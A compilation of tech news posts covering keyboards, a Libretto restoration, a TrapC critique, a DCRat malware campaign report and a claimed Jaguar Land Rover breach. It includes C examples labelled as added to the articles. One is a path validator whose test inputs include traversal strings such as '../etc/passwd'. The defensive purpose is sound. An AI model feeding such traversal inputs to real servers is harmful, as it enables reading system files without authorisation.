
Keebin’ with Kristina: the One with the Batwing Typewriter


Illustrated Kristina with an IBM Model M keyboard floating between her hands.

[Alex] of YouTube channel [EastMakes] wrote in to tell me about his fantastic QWERTY ‘hexpansion’ board for the 2024 EMF Tildagon badge, and [Alex], I’m super glad you did. The system works!

Let’s back up a bit. Essentially, the idea is to have a badge that can be used beyond a single camp, with the creation of expansion boards being the other main attraction. Our own [Jenny List] covered the badge in detail back in June 2024 when she got her hands on one.

A pair of hands holds the 2024 EMF Tildagon badge with a QWERTY keyboard Hexpansion built by [EastMakes]. Image by [EastMakes] via YouTube

[Alex] started by importing the Tildagon into Fusion360 and designing a way for the keyboard to attach to it physically. He then modeled the keyboard after the Blackberry types that can be found on Ali using the official EMF buttons established in earlier badges.

This QWERTY hexpansion is based on the RP2040, which is soldered around back and visible through the 3D-printed backplate. In order for the 90°-oriented board to align with the… not-90° connector, [Alex] built a little meander into the PCB.

The default OS on the Tildagon doesn’t know natively what to do with the serial messages from the keyboard, so [Alex] wrote an application that reads them in and decodes them. Be sure to check out the build and walk-through video after the break.

youtube.com/embed/5mLt09UtY2E?…

More, Children, Is Just a Slot Away


[New-Concentrate6308] is cooking up something new in the form of a 50% keyboard with a cartridge slot! The custom layout has been dubbed Esul, and has the Esc to the left of Tab, among other interesting features.

A custom keyboard with a cartridge system! Image by [New-Concentrate6308] via reddit

Inspired by [mujimanic]’s giga 40, the cartridges add modules to the keyboard. If you want a screen, just slot one in. You could also up the RGB, or add something useful like a knob, or even some more keys.

You may have noticed the lack of an up arrow key. It’s there, it’s just a tap away on the right Shift, which becomes Shift if you hold it down.

This thing is not going to be for everyone, but that’s not the point. (Is it ever?) The point is that [New-Concentrate6308] wanted a fun keyboard project and found it in spades. Plus, it looks fantastic.

The Centerfold: At the Corner of Practical and Paradise


A lovely corner desk setup with a lake and mountains out the windows. Image by [jamesvyn] via reddit

Do I really need to say anything here? Can we all just enjoy the beauty of Switzerland for a moment?

[jamesvyn] recently switched from two monitors to a wide boi and is loving every minute of it. I particularly like the base — something about that shape is quite pleasing.

I bet it was difficult to find a wallpaper that does the view any justice. I have almost no details here, but I can tell you that the pager-looking thing near the mouse is a Pomodoro timer. And that’s an interesting wrist rest block-thing. Not sure I could use that for an extended period of time. Could you?

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the Oliver


An Oliver typewriter with its iconic bat-wing typebars. An Oliver no. 2 machine. Image via The Antikey Chop

Today, we can not only see what we type as we type it, we can do things like correct entire words with a simple key combination (Ctrl + Backspace). In the late 1800s, though, seeing what you were typing as well as we do now was a pipe dream until the Oliver typewriter came along. It is thought that inventor Rev. Thomas Oliver sought to create a machine that would make his sermons more legible.

Oliver typewriters were quite distinct with their three-row keyboards and so-called ‘batwing’ typebar arrangement. This style, wherein the typebars struck the platen downward instead of upward, made it a partially visible typewriter. Since it would be years until fully visible Underwoods and Royals came along, this made the Oliver quite the sought-after machine.

Unfortunately, this three-row design did not stay in vogue. As the four-row, single-Shift layout became standard, the writing was on the wall for the Oliver. Adding a fourth row of keys would have meant even taller batwings and an even heavier machine.

Some Oliver models were re-badged for foreign markets and carried names such as Courier, Stolzenberg, Jwic, Fiver, and Revilo. Stateside, the No. 2 was rebranded by Sears & Roebuck as the Woodstock.

Finally, the Clicks Keyboard Case Comes to Android


Do you miss your Blackberry or Sidekick? I miss my Palm Centro’s bubble-poppy keyboard, and I’d love to have a Sidekick or something comparable today. Or like, anything with a keyboard.

A person holds out an Android phone with a Clicks keyboard case in neon yellow with purple keys. Image by [Clicks] via New Atlas

If you don’t mind having an even bigger phone, then the dream is alive in the form of the Clicks keyboard case, which has finally made its way to Android phones beginning with the Google Pixel 9 and 9 Pro.

The Android Clicks cases will be even better than those created for the iPhone, with upgrades like larger, backlit, domed metal keys, a flexible TPU shell, and a felt lining to protect the phone. Also, there will be Qi wireless charging right through the case, which will accept magnetic accessories as well.

While cases for the Pixel 9s are available for pre-order at $99, there is also the option to reserve Clicks for the 2024 Motorola razr as well as the Samsung Galaxy S25. Check out the overview video if you want to know more, and you can also see it in action on the aforementioned phones.

Or — hear me out — we could just get devices with physical keyboards again. There’s obviously a demand. Your move, manufacturers.


Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.


hackaday.com/2025/03/11/keebin…


Tiny Laptop Gets a New Case and an Unlocking


Unless you’ve got an especially small lap, calling the Toshiba Libretto a laptop is a bit of a stretch. The diminutive computers from the mid-1990s had a lot of the usual laptop features, but in an especially compact and portable case that made them a great choice for anyone with an on-the-go lifestyle.

Fast-forward thirty years or so, and the remaining Librettos haven’t fared too well. Many of them have cases that crumble at the slightest touch, which is what led [polymatt] to undertake this meticulous case replacement. The effort started with a complete teardown; luckily, the lower aluminum-alloy shell was in fine shape, but the upper case parts were found to be almost too deteriorated to handle. Still, with a little patience and the judicious application of tape, [polymatt] was able to scan the case pieces on a flatbed scanner and import them into his CAD package. Great tip on the blue-tack for leveling the parts for accurate scanning, by the way.

After multiple rounds of printing and tweaking, [polymatt] had a case good enough to reassemble the Libretto. Unfortunately, the previous owner left an unwanted gift: a BIOS password. Disconnecting the CMOS battery didn’t reset it, but a little research told him that shorting a few pins on the parallel port on the machine’s dock should do the trick. It was a bit involved, requiring the design and subsequent bodging of a PCB to fit into the docking port connector, but in the end he was able to wake up a machine to all its Windows 95 glory. Better get patching.

In a time when laptops were more like lap-crushers, the Libretto was an amazing little machine, and thirty years on, they’re well worth saving from the scrap heap. Hats off to [polymatt] for the effort to save this beauty, and if he needs tips on reading data from any PCMCIA cards that may have come with it, we’ve got him covered.

youtube.com/embed/AdeswJreJ98?…


hackaday.com/2025/03/11/tiny-l…


TrapC: A C Extension For the Memory Safety Boogeyman


In the world of programming languages it often feels like being stuck in a Groundhog Day-esque loop through purgatory, as effectively the same problems are being solved over and over, with previous solutions forgotten and there’s always that one jubilant inventor stumbling out of a darkened basement with the One True Solution™ to everything that plagues this world beset by the Unspeakable Horror that is the C programming language.

As the latest entry to pledge its fealty at the altar of the Church of the Holy Memory Safety, TrapC promises to fix C, while also lambasting Rust for allowing that terrible unsafe keyword. Of course, since this is yet another loop through purgatory, the entire idea that the problem is C and some perceived issue with this nebulous ‘memory safety’ is still a red herring, as pointed out previously.

In other words, it’s time for a fun trip back to the 1970s when many of the same arguments were being rehashed already, before the early 1980s saw the Steelman language requirements condensed by renowned experts into the Ada programming language. As it turns out, memory safety is a minuscule part of a well-written program.

It’s A Trap


Pretty much the entire raison d’être for new programming languages like TrapC, Rust, Zig, and kin is this fixation on ‘memory safety’, with the idea being that the problem with C is that it doesn’t check memory boundaries and allows usage of memory addresses in ways that can lead to Bad Things. Which is not to say that such events aren’t bad, but because they are so obvious, they are also very easy to detect using both static and dynamic analysis tools.

As a ‘proposed C-language extension’, TrapC would add:

  • memory-safe pointers.
  • constructors & destructors.
  • the trap and alias keywords.
  • Run-Time Type Information.

It would also remove:

  • the goto and union keywords.

The author, Robin Rowe, freely admits to this extension being ‘C++ like’, which takes us right back to 1979 when a then young Danish computer scientist (Bjarne Stroustrup) created a C-language extension cheekily called ‘C++’ to denote it as enhanced C. C++ adds many Simula features, a language which is considered the first Object-Oriented (OO) programming language and is an indirect descendant of ALGOL. These OO features include constructors and destructors. Together with (optional) smart pointers and the bounds-checked strings and containers from the Standard Template Library (STL) C++ is thus memory safe.

So what is the point of removing keywords like goto and union? The former is pretty much the most controversial keyword in the history of programming languages, even though it derives essentially directly from jumps in assembly language. The Ada programming language also has the goto keyword; it is often used to provide flexibility where restrictive language choices would otherwise lead to convoluted loop constructs, since some C-isms, like the continue keyword, do not exist in Ada.

The union keyword is similarly removed in TrapC, with the justification that both keywords are ‘unsafe’ and ‘widely deprecated’. Which makes one wonder how much real-life C & C++ code has been analyzed to come to this conclusion. In particular, in embedded and driver programming with low-level memory (and register) access, union is widely used for the flexibility it offers.

Of course, if you’re doing low-level memory access you’re also free to use whatever pointer offset and type casting you require, together with very unsafe, but efficient, memcpy() and similar operations. There is a reason why C++ doesn’t forbid low-level access without guardrails, as sometimes it’s necessary and you’re expected to know what you’re doing. This freedom in choosing between strict memory safety and the untamed wilds of C is a deliberate design choice in C++. In embedded programming you tend to compile C++ with both RTTI & exceptions disabled as well due to the overhead from them.
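As an added illustration (not code from the article or from TrapC) of the low-level idioms just mentioned, here is the same bit-level access done through a union and through memcpy(), the two tools the text says embedded code relies on. The type and function names are this example’s own, and it assumes a 32-bit IEEE 754 float:

```c
/* Added example, not from the article or TrapC: the two low-level access
 * idioms the text mentions, a union and memcpy(), used to read the raw bit
 * pattern of a float. Both are well-defined C; the point is that the
 * "unsafe" construct is doing legitimate work here. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

_Static_assert(sizeof(float) == 4, "example assumes a 32-bit float");

/* Type punning through a union: reading a member other than the one last
 * written is permitted in C (C99 TC3 onward, 6.5.2.3 footnote). */
uint32_t float_bits_union(float f)
{
    union {
        float    f;
        uint32_t u;
    } pun;
    pun.f = f;
    return pun.u;
}

/* The same thing with memcpy(): the portable idiom that compilers turn into
 * a plain register move, and the one C++ code usually prefers. */
uint32_t float_bits_memcpy(float f)
{
    uint32_t u;
    memcpy(&u, &f, sizeof u);   /* both objects are exactly 4 bytes */
    return u;
}

/* A register-style overlay: the whole 32-bit word or its individual bytes.
 * Which byte holds which part of the word depends on endianness, so code
 * relying on this must know its target, which is exactly the embedded
 * situation the article describes. */
typedef union {
    uint32_t word;
    uint8_t  bytes[4];
} reg32_t;

/* The sum of the four bytes does not depend on endianness, so it is a
 * result that can be checked on any platform. */
unsigned reg32_byte_sum(uint32_t word)
{
    reg32_t r;
    r.word = word;
    return (unsigned)r.bytes[0] + r.bytes[1] + r.bytes[2] + r.bytes[3];
}

int main(void)
{
    printf("1.0f -> 0x%08X (union)  0x%08X (memcpy)\n",
           (unsigned)float_bits_union(1.0f), (unsigned)float_bits_memcpy(1.0f));
    printf("0x01020304 byte sum -> %u\n", reg32_byte_sum(0x01020304u));
    return 0;
}
```

Both accessors return the same word; the union form is the one TrapC would remove, the memcpy form is the one that stays, and neither is any safer than the other in the hands of someone who gets the sizes wrong.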

Don’t Call It C++


Effectively, TrapC adds RTTI, exceptions (or ‘traps’), OO classes, safe pointers, and similar C++ features to C, which raises the question of why it’s any different, especially since the whitepaper describes TrapC and C++ code usually looking the same as a feature. Here the language seems to regard itself as being a ‘better C++’, mostly in terms of exception handling and templates, using ‘traps’ and ‘castplates’. Curiously there’s not much focus on “resource acquisition is initialization” (RAII) that is such a cornerstone of C++.

Meanwhile castplates are advertised as a way to make C containers ‘typesafe’, but unlike C++ templates they are created implicitly using RTTI and one might argue somewhat opaque (C++ template-like) syntax. There are few people who would argue that C++ template code is easy to read. Of note here is that in embedded programming you tend to compile C++ with both RTTI & exceptions disabled due to the overhead from them. The extensive reliance on RTTI in TrapC would seem to preclude such an option.

Circling back on the other added keyword, alias, this is TrapC’s way of providing function overloading, and it works like a C preprocessor #define:

void puts(void* x) alias printf("{}\n",x);

Then there is the new trap keyword that’s apparently important enough to be captured in the extension’s name. These are offered as an alternative to C++ exceptions, but the description is rather confusing, other than that it’s supposedly less complicated and does not support cascading exceptions up the stack. Here I do not personally see much value either way, as like so many C++ developers I loathe C++ exceptions with the fire of a thousand Suns and do my utmost to avoid them.

My favorite approach here is found in Ada, which not only cleanly separates functions and procedures, but also requires, during compile time, that any return value from a function is handled, and implements exceptions in a way that is both light-weight and very informative, as I found for example while extensively using the Ada array type in the context of a lock-free ring buffer. During testing there were zero crashes, just the program bailing out with an exception due to a faulty offset into the array and listing the exact location and cause, as in Ada everything is bounds-checked by default.
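To make the contrast concrete for both the ‘easy to detect’ claim above and the ring-buffer anecdote, here is an added example (not from the article, and not Ada) of a fixed-size ring buffer in C with an Ada-style checked accessor beside the unchecked one. The ringbuf_t type, the rb_* names and the rb_scenario() helpers are this example’s own:

```c
/* Added example, not from the article: a fixed-size ring buffer in C with
 * an Ada-style checked accessor beside the unchecked one. Ada would reject
 * the bad index at run time with Constraint_Error; in C the check has to be
 * written, and forgetting it is the bug the article's tests kept catching. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define RB_CAP 8

typedef struct {
    int    data[RB_CAP];
    size_t head;    /* next slot to write */
    size_t count;   /* valid elements, 0..RB_CAP */
} ringbuf_t;

void rb_init(ringbuf_t *rb)
{
    memset(rb, 0, sizeof *rb);   /* zeroed slots make stale reads visible */
}

/* Write one element, overwriting the oldest when full. */
void rb_push(ringbuf_t *rb, int v)
{
    rb->data[rb->head] = v;
    rb->head = (rb->head + 1) % RB_CAP;
    if (rb->count < RB_CAP)
        rb->count++;
}

/* Unchecked read of the element `offset` places after the oldest one.
 * Nothing stops offset >= count: the modulo keeps the access inside the
 * array, so instead of a crash the caller silently gets a stale or zero
 * slot, a plausible-looking wrong value. */
int rb_peek_unchecked(const ringbuf_t *rb, size_t offset)
{
    size_t oldest = (rb->head + RB_CAP - rb->count) % RB_CAP;
    return rb->data[(oldest + offset) % RB_CAP];
}

/* Checked read: the caller learns that the offset was out of range. */
bool rb_peek(const ringbuf_t *rb, size_t offset, int *out)
{
    if (offset >= rb->count)
        return false;           /* out of bounds: refuse, do not guess */
    size_t oldest = (rb->head + RB_CAP - rb->count) % RB_CAP;
    *out = rb->data[(oldest + offset) % RB_CAP];
    return true;
}

/* Scenario helper: push `pushes` values (10, 20, 30, ...) into a fresh
 * buffer, then read `offset` with the checked accessor. Returns the value,
 * or -1 when the read was rejected. */
int rb_scenario(size_t pushes, size_t offset)
{
    ringbuf_t rb;
    int v;
    rb_init(&rb);
    for (size_t i = 1; i <= pushes; i++)
        rb_push(&rb, (int)i * 10);
    return rb_peek(&rb, offset, &v) ? v : -1;
}

/* Same scenario with the unchecked accessor: it never "fails". */
int rb_scenario_unchecked(size_t pushes, size_t offset)
{
    ringbuf_t rb;
    rb_init(&rb);
    for (size_t i = 1; i <= pushes; i++)
        rb_push(&rb, (int)i * 10);
    return rb_peek_unchecked(&rb, offset);
}

int main(void)
{
    printf("5 pushes, unchecked offset 7: %d (stale slot, no error)\n",
           rb_scenario_unchecked(5, 7));
    printf("5 pushes, checked   offset 7: %d (-1 = rejected)\n",
           rb_scenario(5, 7));
    return 0;
}
```

The unchecked accessor is the more dangerous of the two precisely because it does not crash: a static analyser cannot see the missing `offset < count` relation, and a dynamic one only catches it if the modulo is absent and the read actually leaves the array.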

Memory Safety


Much of the safety in TrapC would come from managed pointers, with its author describing TrapC’s memory management as ‘automatic’ in a recent presentation at an ISO C meeting. Pointers are lifetime-managed, but as the whitepaper states, the exact method used is ‘implementation defined’, instead of reference counting as in the C++ specification.

Yet none of this matters in the context of actual security issues. As I noted in 2024, the ‘red herring’ part refers to the real-life security issues that are captured in CVEs and their exploitation. Virtually all of the worst CVEs involve a lack of input validation, which allows users to access data in ‘restricted’ folders and gain access to databases and other resources. None of which involve memory safety in any way or form, and thus the onus lies on preventing logic errors, solid input validation and preventing lazy or inattentive programmers from introducing the next world-famous CVE.
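As an added example (not from the article), here is one form the ‘solid input validation’ above takes in C: a strict whitelist check on a user-supplied relative path before it is joined to a base directory, which is the control whose absence lets users reach data in ‘restricted’ folders. The function names, the PATH_MAX_LEN limit and the base directory are this example’s own choices:

```c
/* Added example, not from the article: input validation of a user-supplied
 * relative path, the class of check the article says the worst CVEs lack.
 * The rule is deliberately strict: only relative paths made of '/'-separated
 * components, none of them empty, "." or "..", and no backslashes or drive
 * letters. Rejecting is preferred over "cleaning": a sanitiser that rewrites
 * input tends to be bypassed by the next encoding it did not think of. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PATH_MAX_LEN 256   /* example's own limit on accepted input */

/* Returns true only when `path` can never escape the base directory it is
 * later joined to. */
bool is_safe_relative_path(const char *path)
{
    if (path == NULL || *path == '\0')
        return false;
    size_t len = strlen(path);
    if (len > PATH_MAX_LEN)
        return false;                       /* too long to bother with */
    if (path[0] == '/' || path[0] == '\\')
        return false;                       /* absolute path */
    if (len >= 2 && path[1] == ':')
        return false;                       /* Windows drive letter */

    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, '/');
        size_t clen = sep ? (size_t)(sep - p) : strlen(p);
        if (clen == 0)
            return false;                   /* "a//b", "a/" or empty component */
        if (memchr(p, '\\', clen))
            return false;                   /* no alternate separators */
        if ((clen == 1 && p[0] == '.') ||
            (clen == 2 && p[0] == '.' && p[1] == '.'))
            return false;                   /* "." and ".." components */
        if (!sep)
            break;
        p = sep + 1;
    }
    return true;
}

/* Join a validated path to a base directory; false if it did not validate
 * or the result would not fit in `out`. */
bool join_under_base(const char *base, const char *rel, char *out, size_t outsz)
{
    if (!is_safe_relative_path(rel))
        return false;
    int n = snprintf(out, outsz, "%s/%s", base, rel);
    return n > 0 && (size_t)n < outsz;
}

/* Convenience wrapper with a fixed example base directory; returns the
 * joined path, or NULL when the input was rejected. */
const char *join_example(const char *rel)
{
    static char buf[512];
    return join_under_base("/srv/app/files", rel, buf, sizeof buf) ? buf : NULL;
}

int main(void)
{
    /* Constructed sample inputs, from benign to the usual traversal shapes. */
    const char *samples[] = { "docs/readme.txt", "../etc/passwd", "/etc/passwd",
                              "docs/../../x", "a//b", "docs\\..\\x", "C:evil" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *joined = join_example(samples[i]);
        printf("%-18s -> %s\n", samples[i], joined ? joined : "rejected");
    }
    return 0;
}
```

Note what the check does not do: it does not resolve symlinks or normalise Unicode, so on a real server it is the first gate, with the opened file still verified (for example via realpath()) to lie under the base directory.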

As a long-time C & C++ programmer, I have come to ‘love’ the warts in these languages as well as the lack of guardrails for the freedom they provide. Meanwhile I have learned to write test cases and harnesses to strap my code into for QA sessions, because the best way to validate code is by stressing it. Along the way I have found myself incredibly fond of Ada, as its focus on preventing ambiguity and logic errors is self-evident and regularly keeps me from making inattentive mistakes. Mistakes that in C++ would show up in the next test and/or Valgrind cycle followed by a facepalm moment and recompile, yet somehow programming in Ada doesn’t feel more restrictive than writing in C++.

Thus I’ll keep postulating that the issues with C were already solved in 1983 with the introduction of Ada, and accepting this fact is the only way out of this endless Groundhog Day purgatory.


hackaday.com/2025/03/11/trapc-…


DK 9x21 - With Friends Like These...


Von Der Leyen’s wonderful idea: if the USA is no longer interested in NATO, we’ll pay for everything ourselves just to stay in the 1950s. And then the wonderful idea of His Britannic Majesty’s Parliament to “get around” the GDPR.


spreaker.com/episode/dk-9x21-c…


Josephine Cochrane Invented the Modern Dishwasher — In 1886


Popular Science has an excellent article on how Josephine Cochrane transformed how dishes are cleaned by inventing an automated dish washing machine and obtaining a patent in 1886. Dishwashers had been attempted before, but hers was the first with the revolutionary idea of using water pressure to clean dishes placed in wire racks, rather than relying on some sort of physical scrubber. The very first KitchenAid household dishwashers were based on her machines, making modern dishwashers direct descendants of her original design.
Josephine Cochrane (née Garis)
It wasn’t an overnight success. Josephine faced many hurdles. Saying it was difficult for a woman to start a venture or do business during this period of history doesn’t do justice to just how many barriers existed, even discounting the fact that her late husband was something we would today recognize as a violent alcoholic. One who left her little money and many debts upon his death, to boot.

She was nevertheless able to focus on developing her machine, and eventually hired mechanic George Butters to help create a prototype. The two of them working in near secrecy because a man being seen regularly visiting her home was simply asking for trouble. Then there were all the challenges of launching a product in a business world that had little place for a woman. One can sense the weight of it all in a quote from Josephine (shared in a write-up by the USPTO) in which she says “If I knew all I know today when I began to put the dishwasher on the market, I never would have had the courage to start.”

But Josephine persevered and her invention made a stir at the 1893 World’s Fair in Chicago, winning an award and mesmerizing onlookers. Not only was it invented by a woman, but her dishwashers were used by restaurants on-site to clean tens of thousands of dishes, day in and day out. Her marvelous machine was not yet a household device, but restaurants, hotels, colleges, and hospitals all saw the benefits and lined up to place orders.

Early machines were highly effective, but they were not the affordable, standard household appliances they are today. There certainly existed a household demand for her machine — dishwashing was a tedious chore that no one enjoyed — but household dishwashing was a task primarily done by women. Women did not control purchasing decisions, and it was difficult for men of the time (who did not spend theirs washing dishes) to be motivated about the benefits. The device was expensive, but it did away with a tremendous amount of labor. Surely the price was justified? Yet women themselves — the ones who would benefit the most — were often not on board. Josephine reflected that many women did not yet seem to think of their own time and comfort as having intrinsic value.

Josephine Cochrane ran a highly successful business and continued to refine her designs. She died in 1913 and it wasn’t until the 1950s that dishwashers — direct descendants of her original design — truly started to become popular with the general public.

Nowadays, dishwashers are such a solved problem that not only are they a feature in an instructive engineering story, but we rarely see anyone building one (though it has happened.)

We have Josephine Cochrane to thank for that. Not just her intellect and ingenuity in coming up with it, but the fact that she persevered enough to bring her creation over the finish line.


hackaday.com/2025/03/11/joseph…


DCRat backdoor returns


Since the beginning of the year, we’ve been tracking in our telemetry a new wave of DCRat distribution, with paid access to the backdoor provided under the Malware-as-a-Service (MaaS) model. The cybercriminal group behind it also offers support for the malware and infrastructure setup for hosting the C2 servers.

Distribution


The DCRat backdoor is distributed through the YouTube platform. Attackers create fake accounts or use stolen ones, then upload videos advertising cheats, cracks, gaming bots and similar software. In the video description is a download link to the product supposedly being advertised. The link points to a legitimate file-sharing service where a password-protected archive awaits, the password for which is also in the video description.

YouTube video ad for a cheat and crack

Instead of gaming software, these archives contain the DCRat Trojan, along with various junk files and folders to distract the victim’s attention.

Archives with DCRat disguised as a cheat and crack

Backdoor


The distributed backdoor belongs to a family of remote access Trojans (RATs) dubbed Dark Crystal RAT (DCRat for short), known since 2018. Besides backdoor capability, the Trojan can load extra modules to boost its functionality. Throughout the backdoor’s existence, we have obtained and analyzed 34 different plugins, the most dangerous functions of which are keystroke logging, webcam access, file grabbing and password exfiltration.

DCRat builder plugins on the attackers’ site

Infrastructure


To support the infrastructure, the attackers register second-level domains (most often in the RU zone), which they use to create third-level domains for hosting the C2 servers. The group has registered at least 57 new second-level domains since the start of the year, five of which already serve more than 40 third-level domains.

A distinctive feature of the campaign is the appearance of certain words in the second-level domains of the malicious infrastructure, such as “nyashka”, “nyashkoon”, “nyashtyan”, etc. Users interested in Japanese pop culture will surely recognize these slang terms. Among anime and manga fans, “nyasha” has come to mean “cute” or “hon”, and it’s this word that’s most often seen in the second-level domains.

C2 server addresses with characteristic naming approach
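The naming pattern above lends itself to a simple triage rule. As an added example (not from the Securelist report), here is a small C filter that pulls the second-level domain out of DNS query log lines and flags the ones whose second-level domain carries a “nyash” token; the log format, the function names and every domain in the sample are constructed for the example and none is a real indicator:

```c
/* Added example, not from the Securelist report: a triage filter applying
 * the naming pattern the report describes (slang tokens such as "nyash" in
 * the second-level domain) to DNS query log lines. The log format and all
 * domains below are constructed for the example; none is a real indicator. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Copy the second-level domain of `fqdn` into `out`, lower-cased:
 * "a.b.example.ru" -> "example.ru". Returns false with fewer than two
 * labels. Public-suffix handling (co.uk etc.) is out of scope here. */
bool second_level_domain(const char *fqdn, char *out, size_t outsz)
{
    size_t len = strlen(fqdn);
    if (len == 0 || len >= outsz)
        return false;
    if (fqdn[len - 1] == '.')
        len--;                              /* trailing dot of an FQDN */
    const char *last = NULL, *prev = NULL;
    for (size_t i = 0; i < len; i++)
        if (fqdn[i] == '.') { prev = last; last = fqdn + i; }
    if (!last)
        return false;                       /* single label */
    const char *start = prev ? prev + 1 : fqdn;
    size_t n = len - (size_t)(start - fqdn);
    memcpy(out, start, n);
    out[n] = '\0';
    for (size_t i = 0; i < n; i++)
        out[i] = (char)tolower((unsigned char)out[i]);
    return true;
}

/* Static-buffer convenience wrapper; NULL when no second-level domain. */
const char *sld_of(const char *fqdn)
{
    static char buf[256];
    return second_level_domain(fqdn, buf, sizeof buf) ? buf : NULL;
}

/* Naming token the report associates with this campaign's domains;
 * "nyash" covers nyashka, nyashkoon and nyashtyan. */
static const char *const SUSPICIOUS_TOKENS[] = { "nyash" };

bool is_suspicious_sld(const char *sld)
{
    for (size_t i = 0; i < sizeof SUSPICIOUS_TOKENS / sizeof *SUSPICIOUS_TOKENS; i++)
        if (strstr(sld, SUSPICIOUS_TOKENS[i]))
            return true;
    return false;
}

/* Constructed log line format: "<timestamp> <client-ip> query <fqdn>".
 * Returns true and fills `sld_out` when the queried name matches. */
bool flag_dns_line(const char *line, char *sld_out, size_t outsz)
{
    char ts[32], ip[64], verb[16], fqdn[256];
    if (sscanf(line, "%31s %63s %15s %255s", ts, ip, verb, fqdn) != 4)
        return false;
    if (strcmp(verb, "query") != 0)
        return false;                       /* only look at queries */
    if (!second_level_domain(fqdn, sld_out, outsz))
        return false;
    return is_suspicious_sld(sld_out);
}

/* Run the filter over a set of lines and return how many were flagged. */
size_t count_flagged(const char *const *lines, size_t n)
{
    size_t hits = 0;
    char sld[256];
    for (size_t i = 0; i < n; i++)
        if (flag_dns_line(lines[i], sld, sizeof sld))
            hits++;
    return hits;
}

/* Constructed sample log, not real telemetry. */
static const char *const SAMPLE_LOG[] = {
    "2025-03-11T10:00:01Z 10.0.0.5 query api.nyashka-test.ru.",
    "2025-03-11T10:00:02Z 10.0.0.5 query cdn.example.com",
    "2025-03-11T10:00:03Z 10.0.0.7 query panel.NYASHKOON-test.ru",
    "2025-03-11T10:00:04Z 10.0.0.9 response something.ru",
    "2025-03-11T10:00:05Z 10.0.0.9 query nyashtyan-sample.net",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

int main(void)
{
    char sld[256];
    for (size_t i = 0; i < SAMPLE_LOG_LEN; i++)
        if (flag_dns_line(SAMPLE_LOG[i], sld, sizeof sld))
            printf("FLAG %s  <- %s\n", sld, SAMPLE_LOG[i]);
    printf("%zu of %zu lines flagged\n", count_flagged(SAMPLE_LOG, SAMPLE_LOG_LEN), SAMPLE_LOG_LEN);
    return 0;
}
```

A substring rule like this is a review queue feeder, not a blocklist: it is cheap to run over resolver logs, but a hit only says the name fits the campaign’s habit, so the domain’s registration date and the process that queried it are what turn it into an alert.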

Victims


Based on our telemetry data since the beginning of 2025, 80% of DCRat samples using such domains as C2 servers were downloaded to the devices of users in Russia. The malware also affected a small number of users from Belarus, Kazakhstan and China.

Conclusion


Kaspersky products detect the above-described samples with the verdict Backdoor.MSIL.DCRat.
Note that we also encounter campaigns distributing other types of malware (stealers, miners, loaders) through password-protected archives, so we strongly recommend downloading game-related software only from trusted sources.


securelist.com/new-wave-of-att…


Jaguar Land Rover in the Crosshairs: a Threat Actor Claims to Have Published Confidential Data!


The cybersecurity world may be facing a new possible attack that would have hit one of the icons of the British automotive industry. Jaguar Land Rover (JLR), the prestigious manufacturer of luxury vehicles, was reportedly mentioned in an alleged Data Breach claimed by a cybercriminal known as “Rey”, who claims to have obtained and published highly sensitive company data.

At the moment, we cannot confirm the veracity of the news, since the organization has not yet released any official press statement on its website regarding the incident. Therefore, this article should be considered an ‘intelligence source’.

Details of the Post on the Underground Forum


According to the post on the Dark Web, the alleged data breach would include roughly 700 internal documents, including development logs, tracking data and even source code. It also mentions an employee data set that would contain sensitive information such as username, email, display name, time zone and more.

If this information were authentic, it could include confidential data on projects under development, business strategies and employees’ personal information, with possible risks of identity theft, spear-phishing attacks and industrial espionage. What would the consequences be for JLR? If the leak contained information on future models or technological innovations, the damage could extend well beyond the single attack, affecting the company’s competitiveness in the long term.

A Targeted Attack or an Exploited Flaw?


At the moment there is no official confirmation of the dynamics of the attack, nor of its authenticity. It is unclear whether this is a targeted intrusion or whether Rey simply exploited a vulnerability in JLR’s systems. However, the information in circulation would suggest careful preparation and a coordinated action. If true, it would be an alarming signal for the entire automotive sector, which is increasingly exposed to cyber threats.

A Wake-up Call for the Automotive Sector?


If confirmed, this attack would not be an isolated case: the automotive sector is increasingly in the crosshairs of cybercriminals, who see in automotive companies an enormous amount of valuable data and critical infrastructure to compromise. With the advent of connected vehicles and digitized supply chains, the risk of cyber intrusions keeps growing.

Conclusion


Once again, if this information were true, it would demonstrate how crucial it is to adopt advanced security strategies and strengthen protective measures to prevent data leaks and devastating attacks. The question that remains open is: how prepared is the automotive sector, really, to counter this escalation of threats?

As is our custom, we always leave room for a statement from the company should it wish to give us updates on the matter. We will be happy to publish such information in a dedicated article giving prominence to the issue.

RHC will monitor the evolution of the matter so as to publish further news on the blog should there be substantial developments. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower’s encrypted email.

The article Jaguar Land Rover in the Crosshairs: a Threat Actor Claims to Have Published Confidential Data! comes from the information security blog.


Homebrew Traffic Monitor Keeps Eyes on the Streets


How many cars go down your street each day? How fast were they going? What about folks out on a walk or people riding bikes? It’s not an easy question to answer, as most of us have better things to do than watch the street all day and keep a tally. But at the same time, this is critically important data from an urban planning perspective.

Of course, you could just leave it to City Hall to figure out this sort of thing. But what if you want to get a speed bump or a traffic light added to your neighborhood? Being able to collect your own localized traffic data could certainly come in handy, which is where TrafficMonitor.ai from [glossyio] comes in.

This open-source system allows the user to deploy an affordable monitoring device that will identify vehicles and pedestrians using a combination of machine learning object detection and Doppler radar. The system not only collects images of all the objects that pass by but can even determine their speed and direction. The data is stored and processed locally and presented via a number of graphs through the system’s web-based user interface.

While [glossyio] hopes to sell kits and even pre-built monitors at some point, you’ll have to build the hardware yourself for now. The documentation recommends a Raspberry Pi 5 for the brains of your monitor, backed up by a Coral AI Tensor Processing Unit (TPU) to help process the images coming in via the Pi Camera Module 3.

Technically, the OPS243-A Doppler radar sensor is listed as optional if you’re on a tight budget, but it looks like you’ll lose speed and direction sensing without it. Additionally, there’s support for adding an air quality sensor to see what all those passing cars are leaving behind.

